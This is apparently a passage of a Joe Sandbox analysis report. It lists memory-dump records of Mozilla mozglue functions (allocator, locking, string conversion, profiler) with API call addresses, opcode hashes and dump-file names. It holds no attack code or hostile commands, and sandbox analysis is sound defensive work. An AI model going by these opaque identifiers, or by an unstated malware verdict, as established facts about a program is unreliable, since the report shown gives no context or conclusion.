                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 48571db221d4d2966e3a5b5f1a5fcdc90fea2fa373d80052755d21dbd37bcf38
                                                                  • Instruction ID: 65d517fcb88b2b3994f994d32a94feb82ec5be8a557cef981796d215107d6a9b
                                                                  • Opcode Fuzzy Hash: 48571db221d4d2966e3a5b5f1a5fcdc90fea2fa373d80052755d21dbd37bcf38
                                                                  • Instruction Fuzzy Hash: B341E0B1A002068FEB14CF69D88876E77F6EF45308F248939D556EB740E731E904CBA9
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E784), ref: 6C5FCFF6
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784), ref: 6C5FD026
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C5FD06C
                                                                  • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C5FD139
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 1090480015-2608361144
                                                                  • Opcode ID: 96f7b679b3f4274684a668253d7f5f9a056da420a2e17bd75f6d3a95bac9469b
                                                                  • Instruction ID: 674dbd5756f90c8b7ebd00cb7bc3c2f510b89eef4adb7bb024d92df786ab39bb
                                                                  • Opcode Fuzzy Hash: 96f7b679b3f4274684a668253d7f5f9a056da420a2e17bd75f6d3a95bac9469b
                                                                  • Instruction Fuzzy Hash: 9F41D232B402264FDB0DCE7D8CD17AA36B4EB49714F140939E928E7784E7A59C058FE9
                                                                  APIs
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5F4E5A
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5F4E97
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5F4EE9
                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5F4F02
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C5F4F1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 713647276-0
                                                                  • Opcode ID: a3e70df1d0fa093091c099c5e06d6108fc11f96cfd842de2afce6ec7f9a8a219
                                                                  • Instruction ID: d53239b49feea3940187118ef2f733c897e63e2b4454cf857c192e3a1fa0ca58
                                                                  • Opcode Fuzzy Hash: a3e70df1d0fa093091c099c5e06d6108fc11f96cfd842de2afce6ec7f9a8a219
                                                                  • Instruction Fuzzy Hash: 7D41CF716087019FD709CF29C88095BB7E5BF89344F108A2DF56A97B41DB30E95ACF92
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67F770), ref: 6C65A858
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65A87B
                                                                    • Part of subcall function 6C65A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C65A88F,00000000), ref: 6C65A9F1
                                                                  • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C65A8FF
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65A90C
                                                                  • LeaveCriticalSection.KERNEL32(6C67F770), ref: 6C65A97E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                  • String ID:
                                                                  • API String ID: 1355178011-0
                                                                  • Opcode ID: e7906ead1db8f65b91c781a85af4e9cee27592f0529f6d53cb85ca9db86233b4
                                                                  • Instruction ID: 504a2319bf629cecb4799c34edcd914dc174864e8c34c285b087bfe5ad49ea22
                                                                  • Opcode Fuzzy Hash: e7906ead1db8f65b91c781a85af4e9cee27592f0529f6d53cb85ca9db86233b4
                                                                  • Instruction Fuzzy Hash: 1D41B3F0D002449FDB00DFA4D885BEEB770FF05324F148A19E81AAB791D7319955CBA9
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(-00000002,?,6C60152B,?,?,?,?,6C601248,?), ref: 6C60159C
                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C60152B,?,?,?,?,6C601248,?), ref: 6C6015BC
                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,6C60152B,?,?,?,?,6C601248,?), ref: 6C6015E7
                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C60152B,?,?,?,?,6C601248,?), ref: 6C601606
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C60152B,?,?,?,?,6C601248,?), ref: 6C601637
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                  • String ID:
                                                                  • API String ID: 733145618-0
                                                                  • Opcode ID: b1928ed530e0ec461e5d56e1d2a12959dcfeb3bfa2ef3c2f5425bd1476174b14
                                                                  • Instruction ID: e41c98989579266f839aaf51f0925141ade9a8a741389991f67c89f089744089
                                                                  • Opcode Fuzzy Hash: b1928ed530e0ec461e5d56e1d2a12959dcfeb3bfa2ef3c2f5425bd1476174b14
                                                                  • Instruction Fuzzy Hash: 3D31EAB1B001149BC71D8E7CDD504AF77A5BB823687280B2DE823EBBD4EB30D9058799
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C66E330,?,6C61C059), ref: 6C65AD9D
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C66E330,?,6C61C059), ref: 6C65ADAC
                                                                  • free.MOZGLUE(?,?,?,?,00000000,?,?,6C66E330,?,6C61C059), ref: 6C65AE01
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,6C66E330,?,6C61C059), ref: 6C65AE1D
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C66E330,?,6C61C059), ref: 6C65AE3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3161513745-0
                                                                  • Opcode ID: b3ec6ad51531d2bd9b6096f0079500c08d3c74abb1d676b3b253a86d5df59c1d
                                                                  • Instruction ID: 88f27191fa96e4c0be3baa1440c729f154c77c3a385149080194aea3b723f517
                                                                  • Opcode Fuzzy Hash: b3ec6ad51531d2bd9b6096f0079500c08d3c74abb1d676b3b253a86d5df59c1d
                                                                  • Instruction Fuzzy Hash: 0D3141B1A002159FDB14DF7A8C44ABBB7F8EF49614F554829E84AD7700E734A805CBB9
                                                                  APIs
                                                                  • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C66DCA0,?,?,?,6C62E8B5,00000000), ref: 6C655F1F
                                                                  • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C62E8B5,00000000), ref: 6C655F4B
                                                                  • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C62E8B5,00000000), ref: 6C655F7B
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C62E8B5,00000000), ref: 6C655F9F
                                                                  • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C62E8B5,00000000), ref: 6C655FD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                  • String ID:
                                                                  • API String ID: 1389714915-0
                                                                  • Opcode ID: e49e406c138811bc81d2d15a308007c89f5dbac2cd3ff2797dd588242b3c0de9
                                                                  • Instruction ID: 8f08228cd8296dfc0b0507a522ed99bdf003d17c61ddb6bc7aa9258af534964e
                                                                  • Opcode Fuzzy Hash: e49e406c138811bc81d2d15a308007c89f5dbac2cd3ff2797dd588242b3c0de9
                                                                  • Instruction Fuzzy Hash: B03118343006008FD715CF29C898A2AB7F5BF89318FA48958F5568BB95C732EC51CF94
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C5FB532
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C5FB55B
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5FB56B
                                                                  • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C5FB57E
                                                                  • free.MOZGLUE(00000000), ref: 6C5FB58F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                  • String ID:
                                                                  • API String ID: 4244350000-0
                                                                  • Opcode ID: ddd97dd248dfdf1a0fd1f986fee33f52acd5d8f9f65716aada658a2a1333bda3
                                                                  • Instruction ID: 5f89e18b36994707c5caae9bca997063d11b1965ce0dbd89f168881fb983afcb
                                                                  • Opcode Fuzzy Hash: ddd97dd248dfdf1a0fd1f986fee33f52acd5d8f9f65716aada658a2a1333bda3
                                                                  • Instruction Fuzzy Hash: A321F871A00205DBDB05DF69CC80B6ABBB9FF42304F284529E914DB342F735D912CBA5
                                                                  APIs
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C5FB7CF
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C5FB808
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C5FB82C
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5FB840
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5FB849
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1977084945-0
                                                                  • Opcode ID: 868f0d7d88f0f031dfd8d7b5b0d11f65aa231e1171ec707aafcd6e6d9f2e13c4
                                                                  • Instruction ID: 159f743b708fa124804545423bfccd56e54f6f11ec66ef1d74aa00ba220e8f9e
                                                                  • Opcode Fuzzy Hash: 868f0d7d88f0f031dfd8d7b5b0d11f65aa231e1171ec707aafcd6e6d9f2e13c4
                                                                  • Instruction Fuzzy Hash: A72148B0E002199FDF08DFA9C8855BEBBB4EF89314F148529E816A7700E731A945CBE5
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C656E78
                                                                    • Part of subcall function 6C656A10: InitializeCriticalSection.KERNEL32(6C67F618), ref: 6C656A68
                                                                    • Part of subcall function 6C656A10: GetCurrentProcess.KERNEL32 ref: 6C656A7D
                                                                    • Part of subcall function 6C656A10: GetCurrentProcess.KERNEL32 ref: 6C656AA1
                                                                    • Part of subcall function 6C656A10: EnterCriticalSection.KERNEL32(6C67F618), ref: 6C656AAE
                                                                    • Part of subcall function 6C656A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C656AE1
                                                                    • Part of subcall function 6C656A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C656B15
                                                                    • Part of subcall function 6C656A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C656B65
                                                                    • Part of subcall function 6C656A10: LeaveCriticalSection.KERNEL32(6C67F618,?,?), ref: 6C656B83
                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6C656EC1
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C656EE1
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C656EED
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C656EFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                  • String ID:
                                                                  • API String ID: 4058739482-0
                                                                  • Opcode ID: 6cb7ef28e46330c4e7bfae06813a46698c8c3db694b20c68e8607573f812041d
                                                                  • Instruction ID: 69f623bfeef32ac7b671824237d71b9297357f010765bbb6f192656798da0cb7
                                                                  • Opcode Fuzzy Hash: 6cb7ef28e46330c4e7bfae06813a46698c8c3db694b20c68e8607573f812041d
                                                                  • Instruction Fuzzy Hash: 5521C1B1A0421A8FCB04CF29D8C4ADE77F5EF84308F044439E80997340EB349A58CFA6
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C5F3DEF), ref: 6C630D71
                                                                  • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C5F3DEF), ref: 6C630D84
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C5F3DEF), ref: 6C630DAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Free$Alloc
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 1852963964-2186867486
                                                                  • Opcode ID: c7801dc0519997f2bca504b8a3d0b609c032d53a035ed05fb16520b3651b8d80
                                                                  • Instruction ID: 6447d727be20cde1120ae188512be7dd1beafafe02cd47e0d2f259daee0b61a1
                                                                  • Opcode Fuzzy Hash: c7801dc0519997f2bca504b8a3d0b609c032d53a035ed05fb16520b3651b8d80
                                                                  • Instruction Fuzzy Hash: 43F0E9313802B423E63616660C0ABAA67DD67C2F25F307436F20CDA9C0DA94E4088ABD
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 6C65586C
                                                                  • CloseHandle.KERNEL32 ref: 6C655878
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C655898
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C6558C9
                                                                  • free.MOZGLUE(00000000), ref: 6C6558D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CloseHandleObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 1910681409-0
                                                                  • Opcode ID: 499642d15e17a1a944024b7e0184998e2946042ae7a4c6c2ca2a60c0ee663af1
                                                                  • Instruction ID: 059be70a4ef38f57214b03a5c980e5eab55874aed7b768ac296e11f6240fa627
                                                                  • Opcode Fuzzy Hash: 499642d15e17a1a944024b7e0184998e2946042ae7a4c6c2ca2a60c0ee663af1
                                                                  • Instruction Fuzzy Hash: F90121717041219BEB0ADF27D88CE067BB8EB93325F644935D416C6610D73194158FAE
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6475C4,?), ref: 6C64762B
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6474D7,6C641385,?,?,?), ref: 6C647644
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64765A
                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6474D7,6C641385,?,?,?), ref: 6C647663
                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6474D7,6C641385,?,?,?), ref: 6C647677
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 418114769-0
                                                                  • Opcode ID: 0f6842bd16dd7647df6bcc13359eb4c045949dba78eeab6521ad3d1dc44ccf1d
                                                                  • Instruction ID: cf39ac143e7702f20dfea94c5c4edbcec9aa4c19f87f408480abf4d86e1b4916
                                                                  • Opcode Fuzzy Hash: 0f6842bd16dd7647df6bcc13359eb4c045949dba78eeab6521ad3d1dc44ccf1d
                                                                  • Instruction Fuzzy Hash: D1F0FF71E10345ABE3018F22C888676B778FFEA298F114316F90452601E7B0A5D18BE0
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6C651800
                                                                    • Part of subcall function 6C62CBE8: GetCurrentProcess.KERNEL32(?,6C5F31A7), ref: 6C62CBF1
                                                                    • Part of subcall function 6C62CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5F31A7), ref: 6C62CBFA
                                                                    • Part of subcall function 6C5F4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C633EBD,6C633EBD,00000000), ref: 6C5F42A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                  • String ID: Details$name${marker.name} - {marker.data.name}
                                                                  • API String ID: 46770647-1733325692
                                                                  • Opcode ID: 72440911051bc0717c853132efcf9e4f89895cea4c6a92dbca42b7d47b9a9717
                                                                  • Instruction ID: 09c58be0249bb8c9678dc0f72f7831a73f08d081ee46268926493b919016b075
                                                                  • Opcode Fuzzy Hash: 72440911051bc0717c853132efcf9e4f89895cea4c6a92dbca42b7d47b9a9717
                                                                  • Instruction Fuzzy Hash: 0C71F670A003069FD704CF29C494B9ABBB1FF86304F544669D8154BB41D770EAA9CFEA
                                                                  APIs
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C642E2D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __acrt_iob_func
                                                                  • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                  • API String ID: 711238415-4149320968
                                                                  • Opcode ID: 3968c1e5476848ad66cf8713c8a9d90e76cd23995ddc41b4c0770d947618cbb7
                                                                  • Instruction ID: 7416517b355430796722b5ce55928937d8c5cf3b6a8f1ef4b3f484b95e32dc8c
                                                                  • Opcode Fuzzy Hash: 3968c1e5476848ad66cf8713c8a9d90e76cd23995ddc41b4c0770d947618cbb7
                                                                  • Instruction Fuzzy Hash: FC519EB06087818FC724CF25C48169EB7E1AFCA358F20C92DE59A97B50DB30D945CB5E
                                                                  APIs
                                                                    • Part of subcall function 6C62CBE8: GetCurrentProcess.KERNEL32(?,6C5F31A7), ref: 6C62CBF1
                                                                    • Part of subcall function 6C62CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5F31A7), ref: 6C62CBFA
